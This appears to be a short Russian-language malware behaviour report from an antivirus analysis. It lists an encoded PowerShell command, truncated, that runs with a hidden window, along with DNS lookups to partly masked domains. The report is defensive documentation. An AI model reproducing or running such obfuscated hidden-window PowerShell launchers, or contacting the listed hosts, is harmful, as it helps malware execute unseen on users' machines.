Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiADAAYgA0ADkAOAAwADAAOAB4AHgAMQA5AD0AJwBjADgAMAA3ADIAMAAwADAANwAxADAANwAnADsAJAB4ADAAMAAxADMANQA...
- DNS ASK sh###pxw.com
- DNS ASK si#######eddypsychologist.com
- DNS ASK ph######trainernearme.com
- DNS ASK ah####aircenter.com
- DNS ASK co###undy.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiADAAYgA0ADkAOAAwADAAOAB4AHgAMQA5AD0AJwBjADgAMAA3ADIAMAAwADAANwAxADAANwAnADsAJAB4ADAAMAAxADMANQA...' (со скрытым окном)